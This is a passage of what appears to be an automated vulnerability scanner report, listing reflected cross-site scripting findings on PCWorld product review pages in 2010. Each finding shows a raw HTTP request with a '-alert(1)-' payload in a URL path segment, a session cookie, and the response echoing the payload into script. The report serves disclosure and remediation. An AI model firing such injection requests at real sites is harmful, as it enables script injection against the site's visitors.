<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/412265/review95ed1'-alert(1)-'7f87a47127/canon_pixma_mx870.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.140. http://www.pcworld.com/reviews/product/412265/review/canon_pixma_mx870.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/412265/review/canon_pixma_mx870.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862ca'-alert(1)-'76fc45e75c3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/412265/review/canon_pixma_mx870.html862ca'-alert(1)-'76fc45e75c3 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9EF2F7E835A13B8E31F45F9079935162; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:07:57 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/412265/review/canon_pixma_mx870.html862ca'-alert(1)-'76fc45e75c3';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.141. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/418937/review/lenovo_thinkpad_w701ds.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59e07'-alert(1)-'ed5e5f69078 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/418937/review59e07'-alert(1)-'ed5e5f69078/lenovo_thinkpad_w701ds.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:45 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:45 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/418937/review59e07'-alert(1)-'ed5e5f69078/lenovo_thinkpad_w701ds.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docum
...[SNIP]...

1.142. http://www.pcworld.com/reviews/product/418937/review/lenovo_thinkpad_w701ds.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/418937/review/lenovo_thinkpad_w701ds.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d77f'-alert(1)-'b730f841bb2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/418937/review/lenovo_thinkpad_w701ds.html8d77f'-alert(1)-'b730f841bb2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:50 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/418937/review/lenovo_thinkpad_w701ds.html8d77f'-alert(1)-'b730f841bb2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.143. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/464683/review/lexmark_pinnacle_pro901.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aca7f'-alert(1)-'14a2e660044 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/464683/reviewaca7f'-alert(1)-'14a2e660044/lexmark_pinnacle_pro901.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:29 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=B690AC0CEEC37651C47B8FBA56B0011E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:29 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/464683/reviewaca7f'-alert(1)-'14a2e660044/lexmark_pinnacle_pro901.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       docu
...[SNIP]...

1.144. http://www.pcworld.com/reviews/product/464683/review/lexmark_pinnacle_pro901.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/464683/review/lexmark_pinnacle_pro901.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b550'-alert(1)-'790bcdc0925 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/464683/review/lexmark_pinnacle_pro901.html9b550'-alert(1)-'790bcdc0925 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F201A23DAA937638E0686725A2D8FB06; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/464683/review/lexmark_pinnacle_pro901.html9b550'-alert(1)-'790bcdc0925';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.145. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb12f'-alert(1)-'adec32fd08 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/470930/revieweb12f'-alert(1)-'adec32fd08/samsung_ln46c650_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:40 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:40 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470930/revieweb12f'-alert(1)-'adec32fd08/samsung_ln46c650_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
...[SNIP]...

1.146. http://www.pcworld.com/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10866'-alert(1)-'39e7f7710c1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html10866'-alert(1)-'39e7f7710c1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:41 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
);
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470930/review/samsung_ln46c650_46inch_lcd_tv.html10866'-alert(1)-'39e7f7710c1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.147. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 381c1'-alert(1)-'9d27cb5fcbb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/470949/review381c1'-alert(1)-'9d27cb5fcbb/lg_electronics_infinia_47le8500_47inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:51 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:50 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470949/review381c1'-alert(1)-'9d27cb5fcbb/lg_electronics_infinia_47le8500_47inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Reme
...[SNIP]...

1.148. http://www.pcworld.com/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf76b'-alert(1)-'828e8a511f6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.htmlcf76b'-alert(1)-'828e8a511f6 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/470949/review/lg_electronics_infinia_47le8500_47inch_lcd_tv.htmlcf76b'-alert(1)-'828e8a511f6';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.149. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29dee'-alert(1)-'8448a0e63d5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/471085/review29dee'-alert(1)-'8448a0e63d5/panasonic_viera_tcp46g25_46inch_plasma_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:10:11 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=23DE139CE624FED7AAE2062059D17AA2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:10 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/471085/review29dee'-alert(1)-'8448a0e63d5/panasonic_viera_tcp46g25_46inch_plasma_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remember
...[SNIP]...

1.150. http://www.pcworld.com/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b85'-alert(1)-'aebe8372ee5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html11b85'-alert(1)-'aebe8372ee5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F2089B7F39FCE9DAFF75A3CDDCF592D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:10:13 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/471085/review/panasonic_viera_tcp46g25_46inch_plasma_tv.html11b85'-alert(1)-'aebe8372ee5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.151. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 708ca'-alert(1)-'558b730d3aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/484251/review708ca'-alert(1)-'558b730d3aa/avadirect_clevo_x8100_core_i7_gaming_notebook.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:12:29 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=2E0E97665D49215955AADEF88ED10219; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:12:28 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/484251/review708ca'-alert(1)-'558b730d3aa/avadirect_clevo_x8100_core_i7_gaming_notebook.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Reme
...[SNIP]...

1.152. http://www.pcworld.com/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72e09'-alert(1)-'d25ec35c0e1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html72e09'-alert(1)-'d25ec35c0e1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=11E646581C7F9AF5CD237C4AFA48E212; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:12:34 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/484251/review/avadirect_clevo_x8100_core_i7_gaming_notebook.html72e09'-alert(1)-'d25ec35c0e1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.153. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a1786'-alert(1)-'46702a8e1d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/602425/reviewa1786'-alert(1)-'46702a8e1d2/sony_bravia_xbr46hx909_46inch_lcd_tv.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 23:09:52 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=1940E49287A177303E3055EF089685AC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:09:52 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/product/602425/reviewa1786'-alert(1)-'46702a8e1d2/sony_bravia_xbr46hx909_46inch_lcd_tv.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.q
...[SNIP]...

1.154. http://www.pcworld.com/reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d587c'-alert(1)-'ac193886ae4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/product/602425/review/sony_bravia_xbr46hx909_46inch_lcd_tv.htmld587c'-alert(1)-'ac193886ae4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
